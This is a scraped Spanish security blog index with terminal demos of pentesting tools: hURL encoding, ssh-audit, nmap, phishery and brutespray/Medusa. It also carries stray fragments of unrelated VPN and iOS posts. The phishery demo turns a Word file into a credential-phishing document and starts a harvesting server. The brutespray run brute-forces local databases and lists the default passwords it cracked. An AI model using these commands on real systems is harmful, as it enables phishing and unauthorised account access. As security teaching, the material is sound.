WebHackSHL 2.0 con soporte para Server Side Template Injection.

septiembre 29, 2017 Unknown
septiembre 26, 2017 Unknown
apt update && apt upgrade && apt full-upgrade
[shl@SecHackLabs ~]$ hurl --help .::[ hURL - hexadecimal & URL (en/de)coder ]::. v2.1 @COPYLEFT -> fnord0 <at> riseup <dot> net USAGE: /usr/bin/hurl [ -flag|--flag ] [ -f <file1>,<file2> ] [ string ] COMMAND LINE ARGUMENTS -M|--menu => Menu-driven GUI ; /usr/bin/hurl -M -U|--URL => URL encode ; /usr/bin/hurl -U "hello world" -u|--url => uRL decode ; /usr/bin/hurl -u "hello%20world" -D|--DURL => Double URL encode ; /usr/bin/hurl -D "hello world" -d|--durl => double URL decode ; /usr/bin/hurl -d "hello%2520world" -B|--BASE64 => Base64 encode ; /usr/bin/hurl -B "hello world" -b|--base64 => base64 decode ; /usr/bin/hurl -b "aGVsbG8gd29ybGQ=" -H|--HTML => HTML encode ; /usr/bin/hurl -H "<hello world>" -h|--html => hTML decode ; /usr/bin/hurl -h "<hello world>" -X|--HEX => ascii -> heX ; /usr/bin/hurl -X "hello world" --esc :: output in escaped string ; "\x00\x01\x02\x03 ..." --pair :: output in hexpair format ; 00010203 ... -x|--hex => hex -> ascii ; /usr/bin/hurl -x "68656c6c6f20776f726c64" -I|--INT => Int -> hex ; /usr/bin/hurl -I "10" -i|--int => hex -> int ; /usr/bin/hurl -i "0xa" -n|--nint => -int -> hex ; /usr/bin/hurl -n -- -77 -N|--NHEX => -hex -> iNt ; /usr/bin/hurl -N 0xffffffb3 -T|--INTB => inT -> bin ; /usr/bin/hurl -T 30 -t|--bint => bin -> int ; /usr/bin/hurl -t 1010 -F|--FLOATH => Float -> hex ; /usr/bin/hurl -F 3.33 -l|--hfloat => hex -> float ; /usr/bin/hurl -l 0x40551ed8 -o|--octh => octal -> hex ; /usr/bin/hurl -o 35 -O|--HOCT => hex -> Octal ; /usr/bin/hurl -O 0x12 -0|--binh => bin -> hex ; /usr/bin/hurl -0 1100011 -1|--hexb => hex -> bin ; /usr/bin/hurl -1 0x63 -2|--SHA1 => SHA1 checksum ; /usr/bin/hurl -2 "hello world" -3|--SHA224 => SHA224 checksum ; /usr/bin/hurl -3 "hello world" -4|--SHA256 => SHA256 checksum ; /usr/bin/hurl -4 "hello world" -5|--SHA384 => SHA384 checksum ; /usr/bin/hurl -5 "hello world" -6|--SHA512 => SHA512 checksum ; /usr/bin/hurl -6 "hello world" -7|--ROT13 => ROT13 encode ; /usr/bin/hurl -7 "hello world" -8|--rot13 => ROT13 decode ; /usr/bin/hurl -8 "uryyb jbeyq" -9|--stack => push string 2 stack (corelan) ; /usr/bin/hurl -9 "hello world" --esc :: output in escaped string ; "\x00\x01\x02\x03 ..." --pair :: output in hexpair format ; 00010203 ... --ansiC :: output in C format ; 0x00, 0x01, 0x02, 0x03 ... -m|--md5 => md5 digest ; /usr/bin/hurl -m "hello world" -e|--net => int -> hex (net-byte order) ; /usr/bin/hurl -e 4444 -E|--NET => hex (nEt-byte order) -> int ; /usr/bin/hurl -E 5c11 -w|--wbin => hex [file] -> binary [file] ; /usr/bin/hurl -w -f <INfile> <OUTfile> -r|--rbin => binary [file] -> hex (corelan); /usr/bin/hurl -r -f /tmp/msgbox.bin --esc :: output in escaped string ; "\x00\x01\x02\x03 ..." --pair :: output in hexpair format ; 00010203 ... --ansiC :: output in C format ; 0x00, 0x01, 0x02, 0x03 ... --color|--nocolor => enable/disable colored output [default is ENABLED] --corelan => display corelan reference --help => displays help --man => displays extended help with examples --version => displays version information -s => suppress (display result only) -f|--file <file1>,<file2> => use file(s) as input [string] => string as input
[shl@SecHackLabs ~]$ hurl -M [========================================================] [ hURL - v2.1 by fnord0 - @COPYLEFT ] [========================================================] ## Command Example Input Example Output --- ---------------- ------------- -------------- 1) URL encode hello world hello%20world 2) URL decode hello%20world hello world 3) Double URL encode hello world hello%2520world 4) Double URL decode hello%2520world hello world 5) Base64 encode hello world aGVsbG8gd29ybGQ= 6) Base64 decode aGVsbG8gd29ybGQ= hello world 7) HTML encode <hello world> <hello world> 8) HTML decode <hello world> hello world 9) RAW/ascii -> HEX hello world 68656c6c6f20776f726c64 10) HEX -> RAW/ascii 68656c6c6f20776f726c64 hello world 11) INT -> HEX 10 0xa 12) HEX -> INT 0xa 10 13) -INT -> HEX -77 FFFFFFFFFFFFFFB3 14) -HEX -> INT FFFFFFB3 -77 15) INT -> BIN 30 00011110 16) BIN -> INT 1010 10 17) FLOAT -> HEX 3.33 0xb81e5540 18) HEX -> FLOAT 0x40551ed8 1079320280.000000 19) OCTAL -> HEX 35 0x1d 20) HEX -> octal 0x1d 35 21) BIN -> HEX 1100011 0x63 22) HEX -> BIN 63 1100011 23) SHA1 checksum hello world 2aae6c35c94fcfb415dbe95f408b9ce9... 24) SHA224 checksum hello world 2f05477fc24bb4faefd86517156dafde... 25) SHA256 checksum hello world b94d27b9934d3e08a52e52d7da7dabfa... 26) SHA384 checksum hello world fdbd8e75a67f29f701a4e040385e2e23... 27) SHA512 checksum hello world 309ecc489c12d6eb4cc40f50c902f2b4... 28) ROT13 encode hello world uryyb jbeyq 29) ROT13 decode uryyb jbeyq hello world 30) MD5 digest hello world 5eb63bbbe01eeed093cb22bb8f5acdc3 ## Commands useful for shellcode creation Input Output --- -------------------------------------- ----- ------ 31) push string 2 stack (corelanc0d3r) hello world ASM code to push string to stack 32) BINARY [infile] -> HEX (corelanc0d3r) BINARY FILE HEX to screen + counts NULL bytes 33) HEX [infile] -> BINARY [outfile] HEX FILE BINARY FILE 34) INT -> HEX (network-byte order) 4444 5c11 35) HEX (network-byte order) -> INT 5c11 4444 99) Exit hURL hURL> 5 hURL:Base64encode> string or file? :: [string] hURL:Base64encode:string> http://securityhacklabs.blogspot.com Original :: http://securityhacklabs.blogspot.com base64 ENcoded :: aHR0cDovL3NlY3VyaXR5aGFja2xhYnMuYmxvZ3Nwb3QuY29t Press ENTER to continue...
[shl@SecHackLabs ~]$ echo "https://securityhacklabs.blogspot.com" > test [shl@SecHackLabs ~]$ hurl -X -f test Original file :: test Hex ENcoded :: 68747470733a2f2f73656375726974796861636b6c6162732e626c6f6773706f742e636f6d File byte count: 37 bytes [shl@SecHackLabs ~]$ hurl -X --esc -f test Original file :: test Hex ENcoded :: "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x63\x75\x72\x69\x74\x79\x68\x61\x63\x6b\x6c\x61\x62\x73\x2e\x62\x6c\x6f\x67\x73\x70\x6f\x74\x2e\x63\x6f\x6d" File byte count: 37 bytes [shl@SecHackLabs ~]$
[shl@SecHackLabs ~]$ phishery -u https://securityhacklabs.blogspot.com -i ~/documento.docx -o ~/documentoinfectado.docx
[+] Opening Word document: /home/shl/documento.docx
[+] Setting Word document template to: https://securityhacklabs.blogspot.com
[+] Saving injected Word document to: /home/shl/documentoinfectado.docx
[*] Injected Word document has been saved!
[shl@SecHackLabs ~]$
[shl@SecHackLabs ~]$ sudo phishery [sudo] password for shl: [+] Credential store initialized at: credentials.json [+] Starting HTTPS Auth Server on: 0.0.0.0:443
[shl@SecHackLabs ~]$ ssh-audit # ssh-audit.py v1.7.0, moo@arthepsy.eu usage: ssh-audit.py [-1246pbnvl] <host> -h, --help print this help -1, --ssh1 force ssh version 1 only -2, --ssh2 force ssh version 2 only -4, --ipv4 enable IPv4 (order of precedence) -6, --ipv6 enable IPv6 (order of precedence) -p, --port=<port> port to connect -b, --batch batch output -n, --no-colors disable colors -v, --verbose verbose output -l, --level=<level> minimum output level (info|warn|fail)
[shl@SecHackLabs ~]$ ssh-audit github.com # general (gen) banner: SSH-2.0-libssh_0.7.0 (gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52) (gen) compression: enabled (zlib, zlib@openssh.com) # key exchange algorithms (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62 (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak) `- [info] available since OpenSSH 4.4 (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53 (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack `- [warn] using small 1024-bit modulus `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28 # host-key algorithms (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm `- [warn] using small 1024-bit modulus `- [warn] using weak random number generator could reveal the key `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28 # encryption algorithms (ciphers) (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5 `- [info] default cipher since OpenSSH 6.9. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes192-ctr -- [info] available since OpenSSH 3.7 (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52 (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher mode `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47 (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher mode `- [info] available since OpenSSH 2.3.0 (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [warn] using weak cipher mode `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28 (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm `- [fail] disabled since Dropbear SSH 0.53 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm `- [warn] using weak cipher mode `- [warn] using small 64-bit block size `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28 # message authentication code algorithms (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56 (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode `- [warn] using weak hashing algorithm `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28 # algorithm recommendations (for OpenSSH 6.5) (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove (rec) -ssh-dss -- key algorithm to remove (rec) +ssh-ed25519 -- key algorithm to append (rec) -aes192-cbc -- enc algorithm to remove (rec) -aes128-cbc -- enc algorithm to remove (rec) -blowfish-cbc -- enc algorithm to remove (rec) -aes256-cbc -- enc algorithm to remove (rec) +aes128-gcm@openssh.com -- enc algorithm to append (rec) +aes256-gcm@openssh.com -- enc algorithm to append (rec) -hmac-sha2-512 -- mac algorithm to remove (rec) -hmac-sha1 -- mac algorithm to remove (rec) -hmac-sha2-256 -- mac algorithm to remove (rec) +hmac-sha2-256-etm@openssh.com -- mac algorithm to append (rec) +hmac-sha2-512-etm@openssh.com -- mac algorithm to append (rec) +umac-128-etm@openssh.com -- mac algorithm to append
[shl@SecHackLabs ~]$ nmap localhost -oG test.gnmap Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 23:24 UTC Nmap scan report for localhost (127.0.0.1) Host is up (0.000037s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 3306/tcp open mysql 5432/tcp open postgresql 9050/tcp open tor-socks Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds [shl@SecHackLabs ~]$ less test.gnmap [shl@SecHackLabs ~]$ sudo brutespray --file /home/shl/test.gnmap --threads 5 --hosts 5 brutespray.py v1.5.2 Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail Inspired by: Leon Johnson/@sho-luv Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net> Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)... \ Brute-Forcing... Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: password (1 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: admin (2 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password: admin (1 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password: root (2 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: toor (3 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 2 complete) Password: root (4 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 2 complete) Password: toor (3 of 4 complete) ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 2 complete) Password: password (4 of 4 complete) Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net> ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: Password1 (1 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: toor (2 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: password (3 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: root (4 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: password1 (5 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: password123 (6 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: Password123 (7 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: postgres (1 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: postgres (8 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: root (2 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: toor (3 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: Password1 (4 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password (5 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password1 (6 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 2 complete) Password: Password123 (7 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 2 complete) Password: password123 (8 of 8 complete) ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 2 complete) Password: postgres (1 of 8 complete) ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: postgres [SUCCESS] ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 3 complete) Password: toor (2 of 8 complete) ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: toor [SUCCESS] ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 4 complete) Password: Password1 (3 of 8 complete) ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: Password1 [SUCCESS] ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 5 complete) Password: root (4 of 8 complete) ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: root [SUCCESS] ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 6 complete) Password: password (5 of 8 complete) ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: password [SUCCESS] Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
bypass / cracking / Hacking / herramientas haking / Kali Linux / medusa / nmap / password / pentesting
septiembre 17, 2017 Unknown
septiembre 15, 2017 Unknown
septiembre 11, 2017 Unknown
Android / anonimato / cliente vpn / ios / Linux / mac / Macintosh / openvpn / privacidad / Seguridad / vpn / windows vpn
septiembre 10, 2017 Jesse Barrios
![]() |
Le permite ver dos aplicaciones a la vez. |
![]() | |||
Una de las novedades es incluyen 60 nuevos emoji, entre esta tenemos mujeres representando su trabajo. |